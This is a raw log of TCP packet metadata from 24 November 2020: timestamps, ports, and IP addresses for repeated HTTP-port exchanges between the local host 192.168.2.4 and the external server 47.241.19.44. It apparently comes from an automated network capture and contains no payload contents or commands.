Nov 24, 2020 20:35:29.620769024 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.620785952 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.620801926 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.620908022 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.620954990 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.661693096 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.661922932 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.664267063 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.664288044 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.664299011 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.664309978 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.664321899 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.664333105 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.664344072 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.664355993 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.664366007 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.664541006 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.664578915 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.690763950 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.691049099 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.821516991 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821542025 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821558952 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821588993 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821595907 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821607113 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821611881 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821625948 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821640968 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821652889 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821666002 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821683884 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.821748972 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.821798086 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.864618063 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.864643097 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.864655018 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.864666939 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.864680052 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.864691973 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.864705086 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.864722013 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.864737988 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.864932060 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.867996931 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.891413927 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.891632080 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.905818939 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.905925989 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.932511091 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.932580948 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022080898 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022125959 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022152901 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022157907 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022178888 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022183895 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022206068 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022208929 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022229910 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022238016 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022248983 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022267103 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022289038 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022293091 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022317886 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022320032 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022344112 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022346973 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022365093 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022372007 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022389889 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022398949 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.022413015 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.022433043 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.064642906 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.064673901 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.064691067 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.064707041 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.064728975 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.064730883 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.064744949 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.064757109 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.064760923 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.064778090 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.064781904 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.064798117 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.064809084 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.064831972 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.064868927 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.092339039 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.092591047 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.105792046 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.105907917 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.135633945 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.135871887 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.193070889 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.193669081 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.203109980 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.203349113 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.222336054 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222359896 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222376108 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222395897 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222404003 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.222414017 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222429991 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222430944 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.222445965 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222462893 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222469091 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.222477913 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222485065 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.222495079 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222510099 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222520113 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.222532034 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.222556114 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.222567081 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.222598076 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.264307976 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.264348984 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.264354944 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.264359951 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.264377117 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.264385939 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.264394045 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.264410973 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.264436960 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.264445066 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.264463902 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.264475107 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.264492989 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.264528036 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.292958975 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.293024063 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.305289030 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.305474997 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.335303068 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.335378885 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.393542051 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.393568039 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.393670082 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.406444073 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.406586885 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.422064066 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.422102928 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.422115088 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.422127962 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.422139883 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.422152042 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.422163963 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.422174931 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.422188044 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.422200918 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.422358990 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.425371885 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.429647923 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.484663010 CET	49764	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:30.700206041 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:30.799204111 CET	80	49764	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:31.301166058 CET	80	49764	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:31.301393986 CET	49764	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:31.301733017 CET	49764	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:31.572820902 CET	80	49764	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:32.083242893 CET	49766	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:32.084347963 CET	49767	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:32.349999905 CET	80	49767	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:32.350116014 CET	49767	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:32.350853920 CET	49767	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:32.362714052 CET	80	49766	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:32.362965107 CET	49766	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:32.658250093 CET	80	49767	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:33.336285114 CET	80	49767	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:33.336338997 CET	80	49767	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:33.336453915 CET	49767	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:33.336509943 CET	49767	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:33.339523077 CET	49767	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:33.605290890 CET	80	49767	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:34.251946926 CET	49766	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:23.775255919 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.048192978 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.048296928 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.048608065 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.365447044 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.714663982 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.714710951 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.714741945 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.714771986 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.714801073 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.714829922 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.714839935 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.714859962 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.714886904 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.714899063 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.714932919 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.714958906 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.714965105 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.715073109 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.987858057 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.987901926 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.987927914 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.987956047 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.987982988 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988013983 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988043070 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988069057 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988070965 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.988096952 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988123894 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988148928 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988176107 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988200903 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.988202095 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988234997 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988264084 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988287926 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.988289118 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988317966 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988339901 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.988343000 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988369942 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988389969 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:24.988399029 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:24.988599062 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.261241913 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261284113 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261315107 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261348009 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261377096 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261393070 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.261462927 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261488914 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261518955 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261543036 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261574030 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261586905 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.261595964 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.261607885 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261622906 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.261641979 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261672020 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261702061 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261730909 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.261730909 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261761904 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261790037 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.261796951 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261830091 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261857033 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.261859894 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261888027 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.261893034 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.261960983 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.303622961 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303649902 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303781033 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.303783894 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303807020 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303827047 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303848982 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303874969 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303877115 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.303898096 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303919077 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303939104 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303960085 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303980112 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.303987980 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.304002047 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.304023027 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.304039955 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.304054976 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.304069042 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.304069996 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.304086924 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.304147959 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.304277897 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.359302998 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.499934912 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.534715891 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.534775972 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.534802914 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.534836054 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.534876108 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.534919977 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.534920931 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.534957886 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.534959078 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.534965038 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.535001040 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535032988 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.535043001 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535089016 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535120010 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.535130024 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535170078 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535201073 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.535218954 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535262108 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535300016 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535337925 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535373926 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.535376072 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535414934 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535454035 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.535454988 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535495043 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535531044 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.535640001 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.535710096 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.696463108 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696499109 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696518898 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696537018 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696553946 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696569920 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696587086 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696605921 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696624994 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696630955 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.696645021 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696666002 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696666002 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.696671963 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.696685076 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696698904 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.696702003 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:25.696794033 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:25.749978065 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:26.693468094 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:26.734318972 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:27.542149067 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:27.621318102 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:27.621408939 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:27.815021992 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:27.815046072 CET	80	49770	47.241.19.44	192.168.2.4
Nov 24, 2020 20:36:27.815124035 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:27.815176964 CET	49770	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:36:28.089432955 CET	80	49770	47.241.19.44	192.168.2.4
